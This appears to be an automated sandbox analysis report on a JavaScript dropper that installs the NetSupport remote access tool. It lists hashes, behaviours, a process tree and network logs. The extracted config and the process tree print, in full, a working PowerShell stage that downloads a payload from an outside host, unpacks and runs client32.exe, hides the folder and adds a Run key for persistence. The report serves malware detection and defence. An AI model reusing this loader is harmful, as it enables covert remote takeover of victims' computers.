netsupport | c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e

Analysis

max time kernel
135s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24/10/2024, 13:15 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
Size

5.2MB
MD5

a495fbc9b99c98d0a054e937d4dcb944
SHA1

b2a2433591576985adce5da344d72ae669a9cc5f
SHA256

c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
SHA512

67ffdf2a2541127bcd1cf05b8f4c47e99844fb9a01ec33d5ff538e6a176eade5636f20c096e783f5d1c5b849ec2ee952a89a3fc35286d1e0e1000c0a21d39c6a
SSDEEP

49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fu+Cz4F9dM2furCz4F9dMW:OkGgkGMkGgkGbkGgkGMkGgkG9

Score

10^/10

netsupport discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

1
$DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;

URLs

ps1.dropper

https://adullamglobal.com/work/das.php?13401

exe.dropper

https://adullamglobal.com/work/das.php?13401

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	4212	wscript.exe
8	4212	wscript.exe
17	4212	wscript.exe
31	5024	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5024	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
1540	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
1540	client32.exe
1540	client32.exe
1540	client32.exe
1540	client32.exe
1540	client32.exe
1540	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PBHHYCWP = "C:\\Users\\Admin\\AppData\\Roaming\\DEXHCUYIT0\\client32.exe"	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5024	powershell.exe
5024	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeSecurityPrivilege	1540	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1540	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4212 wrote to memory of 5024	4212	wscript.exe	91
PID 4212 wrote to memory of 5024	4212	wscript.exe	91
PID 5024 wrote to memory of 1540	5024	powershell.exe	94
PID 5024 wrote to memory of 1540	5024	powershell.exe	94
PID 5024 wrote to memory of 1540	5024	powershell.exe	94

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5024
- - C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe
    "C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:1540

Network

DNS

adullamglobal.com

powershell.exe

Remote address:

8.8.8.8:53

Request

adullamglobal.com

IN A

Response

adullamglobal.com

IN A

79.141.162.186
POST

https://adullamglobal.com/work/fix.php?2046

wscript.exe

Remote address:

79.141.162.186:443

Request

POST /work/fix.php?2046 HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: adullamglobal.com
Content-Length: 7
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 24 Oct 2024 13:15:29 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename=updates.js
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2274419
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
DNS

r11.o.lencr.org

wscript.exe

Remote address:

8.8.8.8:53

Request

r11.o.lencr.org

IN A

Response

r11.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

2.18.190.73

a1887.dscq.akamai.net

IN A

2.18.190.80
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

61.45.26.184.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.45.26.184.in-addr.arpa

IN PTR

Response

61.45.26.184.in-addr.arpa

IN PTR

a184-26-45-61deploystaticakamaitechnologiescom
DNS

186.162.141.79.in-addr.arpa

Remote address:

8.8.8.8:53

Request

186.162.141.79.in-addr.arpa

IN PTR

Response
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2F289F00A97362650A708A22A87563F0; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:28 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 18894B10D9214D3A9C364DB544D487DD Ref B: LON601060108040 Ref C: 2024-10-24T13:15:28Z
date: Thu, 24 Oct 2024 13:15:28 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F289F00A97362650A708A22A87563F0

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:29 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3E7BB815C5CE4ABE814A8980B10CD154 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
date: Thu, 24 Oct 2024 13:15:28 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F289F00A97362650A708A22A87563F0; MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DC27CC5E6A3945609D12E6D6CE07ABC8 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
date: Thu, 24 Oct 2024 13:15:29 GMT
GET

http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D

wscript.exe

Remote address:

2.18.190.73:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "D2C54317F18E11A735A6475A5F6058D8BAE2F323505325378815102EBB763711"
Last-Modified: Wed, 23 Oct 2024 10:58:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12764
Expires: Thu, 24 Oct 2024 16:48:12 GMT
Date: Thu, 24 Oct 2024 13:15:28 GMT
Connection: keep-alive
DNS

73.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.190.18.2.in-addr.arpa

IN PTR

Response

73.190.18.2.in-addr.arpa

IN PTR

a2-18-190-73deploystaticakamaitechnologiescom
DNS

10.27.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.27.171.150.in-addr.arpa

IN PTR

Response
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
GET

https://adullamglobal.com/work/das.php?13401

powershell.exe

Remote address:

79.141.162.186:443

Request

GET /work/das.php?13401 HTTP/1.1
Host: adullamglobal.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 24 Oct 2024 13:15:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

geo.netsupportsoftware.com

client32.exe

Remote address:

8.8.8.8:53

Request

geo.netsupportsoftware.com

IN A

Response

geo.netsupportsoftware.com

IN A

172.67.68.212

geo.netsupportsoftware.com

IN A

104.26.0.231

geo.netsupportsoftware.com

IN A

104.26.1.231
GET

http://geo.netsupportsoftware.com/location/loca.asp

client32.exe

Remote address:

172.67.68.212:80

Request

GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 24 Oct 2024 13:15:37 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8d7a3c986b0f948d-LHR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDQQCQBADR=IEOBCDPAAFBIPIABLMGHLFAC; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyhUpNqH9W8t%2FmJnQ6JaeU5eY1ZJm%2BjvfF8KVi4IldniyyManFpQYciBPOgynYcm0YHxGCw8Vzjgv9Stg5yRq6QstsqUcKEuI9BQaWGiaAsxwiJE%2FRdscv%2FSlq4DtMeLe%2BSaTMWga70rGBSb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
DNS

143.159.181.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.159.181.5.in-addr.arpa

IN PTR

Response

143.159.181.5.in-addr.arpa

IN PTR

5-181-159-143 mivocloudcom
DNS

212.68.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.68.67.172.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

212.20.149.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

79.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.190.18.2.in-addr.arpa

IN PTR

Response

79.190.18.2.in-addr.arpa

IN PTR

a2-18-190-79deploystaticakamaitechnologiescom
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 493712
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B296B5E3F52C4072A680F582D3682D1C Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 619595
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E68ACF3F1B2142DF937229ACA8E15473 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 522409
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 90C2CA5B5848470FB9CB1140F62BC6CA Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 534196
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FC5405588C85400C92E991F21EA760F4 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT

79.141.162.186:443

https://adullamglobal.com/work/fix.php?2046

tls, http

wscript.exe

81.2kB
2.3MB
1692
1688

HTTP Request

POST https://adullamglobal.com/work/fix.php?2046

HTTP Response

200
150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

HTTP Response

204
2.18.190.73:80

http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D

http

wscript.exe

522 B
1.1kB
6
4

HTTP Request

GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D

HTTP Response

200
79.141.162.186:443

https://adullamglobal.com/work/das.php?13401

tls, http

powershell.exe

76.5kB
3.1MB
1498
2257

HTTP Request

GET https://adullamglobal.com/work/das.php?13401

HTTP Response

200
5.181.159.143:443

http

client32.exe

2.0kB
814 B
9
7
172.67.68.212:80

http://geo.netsupportsoftware.com/location/loca.asp

http

client32.exe

440 B
1.1kB
7
5

HTTP Request

GET http://geo.netsupportsoftware.com/location/loca.asp

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

80.4kB
2.3MB
1645
1641

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13

8.8.8.8:53

adullamglobal.com

dns

powershell.exe

63 B
79 B
1
1

DNS Request

adullamglobal.com

DNS Response

79.141.162.186
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

r11.o.lencr.org

dns

wscript.exe

61 B
160 B
1
1

DNS Request

r11.o.lencr.org

DNS Response

2.18.190.73

